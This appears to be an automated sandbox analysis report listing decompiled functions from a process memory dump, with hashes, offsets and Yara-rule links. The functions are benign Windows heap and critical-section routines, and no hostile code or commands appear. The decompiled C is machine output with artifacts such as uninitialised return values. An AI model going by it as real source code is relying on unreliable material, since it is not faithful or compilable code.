                                                          • API String ID:
                                                          • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                          • Instruction ID: 378f01d1ba67c2a62024ea0de2ec3dd61d24d02d85c1049341ed6131f307ba3d
                                                          • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                          • Instruction Fuzzy Hash: 8AC01236180248BBCB12AE82CC00F067B2AEB94B60F008015BA080E5618A32E970EA88
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03453A1C, Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E03453A1C(intOrPtr _a4) {
				void* _t5;

				return L03454620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                          0x03453a35

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                          • Instruction ID: bfc1dffadd262f82a4f923eb80c4c10cd022eacd3dd4de9a3b1940949a286b8f
                                                          • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                          • Instruction Fuzzy Hash: 6BC08C32080248BBC712AE42DC00F057B29E790B60F000021BA040EA718536ECA0D58C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034636CC, Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E034636CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L03454620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                          0x034636d2
                                                          0x034636e8
                                                          0x034636d4
                                                          0x034636e5
                                                          0x034636e5

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                          • Instruction ID: 98683ba82e46cb03b41ccc7ef7293d19a1f6580ed8ecd4f9f7ed4d5fb9d43258
                                                          • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                          • Instruction Fuzzy Hash: 25C02B78159480BFD7259F30CD00F1D7254F700A21F6C035873214DAF0D52C9C00D108
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034476E2, Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E034476E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                          0x034476e4
                                                          0x00000000
                                                          0x034476f8
                                                          0x034476fd

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                          • Instruction ID: e96e40025dec5c80a0b294cda64d42bb45b414a7c99fd3310383b501df9433f5
                                                          • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                          • Instruction Fuzzy Hash: 6DC08C741412805EFB2AD708CE20B223E55AB08618F4C01BDFA110D6B2C368B803C20C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0343AD30, Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0343AD30(intOrPtr _a4) {

				return L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                          0x0343ad49

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                          • Instruction ID: 98aa0b52a582c185129c62caa9c66dc35cea4a179ba7ae45bc48e680779c003a
                                                          • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                          • Instruction Fuzzy Hash: 15C08C32080248BBC712AA46DD00F017F29E790B60F000021FA040E6628932E860D588
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03457D50, Relevance: .0, Instructions: 7COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E03457D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                          0x03457d56
                                                          0x03457d5b
                                                          0x03457d60
                                                          0x03457d5d
                                                          0x03457d5d
                                                          0x03457d5d

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                          • Instruction ID: 4b5b509c6ab6e36f2c4b8327bbccf051b22dd508e5ca4a62f34bf253ad2467d9
                                                          • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                          • Instruction Fuzzy Hash: 9EB092343019408FCE26DF18C080B1633E8BB44A40B8800E0E800CBA21D229E8008900
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03462ACB, Relevance: .0, Instructions: 5COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E03462ACB() {
				void* _t5;

				return E0344EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                          0x03462adc

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                          • Instruction ID: 6fe258bd42677c984731ed13e4330429992394bc0d74e5873511b19723a2f584
                                                          • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                          • Instruction Fuzzy Hash: 14B01232C11980CFCF02EF80C610B197331FB00750F0544A590012F930C228AC01CB40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034CFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E034CFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0347CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E034C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E034C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                          0x034cfdda
                                                          0x034cfde2
                                                          0x034cfde5
                                                          0x034cfdec
                                                          0x034cfdfa
                                                          0x034cfdff
                                                          0x034cfe0a
                                                          0x034cfe0f
                                                          0x034cfe17
                                                          0x034cfe1e
                                                          0x034cfe19
                                                          0x034cfe19
                                                          0x034cfe19
                                                          0x034cfe20
                                                          0x034cfe21
                                                          0x034cfe22
                                                          0x034cfe25
                                                          0x034cfe40

                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 034CFDFA
                                                          Strings
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 034CFE2B
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 034CFE01
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                          • API String ID: 885266447-3903918235
                                                          • Opcode ID: 8524588cafb53f92746eda5b9b66d835299503ba997f12b6f741a04ae7395fdb
                                                          • Instruction ID: e70233d404fa6c775e9eaa39863736c63f3d26600948d97e789903a93cea1262
                                                          • Opcode Fuzzy Hash: 8524588cafb53f92746eda5b9b66d835299503ba997f12b6f741a04ae7395fdb
                                                          • Instruction Fuzzy Hash: A4F0FC3A110241BFD7605A46DC05F77BF5ADB45730F24431AF6245D5D1D962F86087F8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%